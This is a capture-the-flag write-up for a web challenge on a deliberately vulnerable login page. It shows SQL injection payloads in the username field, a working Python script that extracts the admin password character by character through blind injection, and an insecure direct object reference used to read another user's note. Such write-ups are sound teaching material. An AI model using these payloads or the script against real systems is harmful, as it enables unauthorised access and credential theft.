# web2

For this challenge, we're given a link to a website. It looks like a super secure login page:

![screenshot](images/screenshot.png)

Entering some random stuff into the login page, we get this message:

![random](images/random.png)

The webpage tells us that we should try SQL injection. Let's do it!

First I tried this:

```
username: ' or ''='
password: ' or ''='
```

![try1](images/try1.png)

Looks like we might need to take a peek at the [source code](login.php) that was linked on the main page. After looking around a bit, it looks like only the username field is vulnerable to sql injection, so that's why our injection for the password field didn't work. Let's take a look at the query that we submitted again:

```
SELECT id, username, password FROM users WHERE username='' or '' = '';
```

We know that when we enter an invalid username, the webpage displays a message saying "That user was not found". Maybe we can use our SQL injection in the username field to change it to check the password instead, and use that to leak the password!

We can check to see if the password for the user 'admin' starts with an 'a' using a query like this:

```
SELECT id, username, password FROM users WHERE username='admin' and password like binary 'a%';
```

Since we can inject anything between the single quotes after `username=` we should be able to form this query without too much trouble.

```
username: admin' and password like binary 'a%
password: asdf
```

The output:

```
* Query: SELECT id, username, password FROM users WHERE username='admin' and password like binary 'a%';
That user was not found
```

Well that didn't quite work, but that's probably because the password doesn't actually start with an a. Let's try again with these credentials to make sure our idea is right:

```
username: admin' and password like binary '%
password: asdf
```

output:

```
* Query: SELECT id, username, password FROM users WHERE username='admin' and password like binary '%';
That password is incorrect
```

Nice! So now all we need to do is enter different characters, followed by the percent sign, until we get a response that contains the message 'That password is incorrect'. Then we can move on to the next character and check and continue the process until none of the characters match (which would mean we now know the entire password). Let's write a python script to automate the process.

``` python
#!/usr/bin/env python3

import requests

url="http://ctf-league.osusec.org:8080/login.php"

alphabet='qwertyuiopasdfghjklzxcvbnm1234567890_'
password=''
passwordlen = 0

while True:
        for letter in alphabet:
                payload = {
                        "username": "admin' AND password LIKE BINARY '" + password + letter + "%",
                        "password": "password=a"
                }

                response = requests.post(url, data=payload)

                if 'password is incorrect' in response.text:
                        password += letter
                        break
        print(password)
        if passwordlen == len(password):
                break
        passwordlen += 1
```

Running the script, we get the password!

```
k
kl
kl6
kl62
kl62j
kl62jd
kl62jdi
kl62jdic
kl62jdicu
kl62jdicu3
kl62jdicu31
kl62jdicu31a
kl62jdicu31ad
kl62jdicu31ad
```

After getting the password and logging in as admin, we're brought to a page where we can view notes make new notes.

![try2](images/try2.png)

Clicking the link to open one of the notes brings us to a page with a suspicious looking URL:

![try3](images/try3.png)

Let's try to open one of the notes with a different id!

![try4](images/try4.png)

Getting close! Let's try `http://ctf-league.osusec.org:8080/note.php?id=2`:

![try5](images/try5.png)

And we get the flag!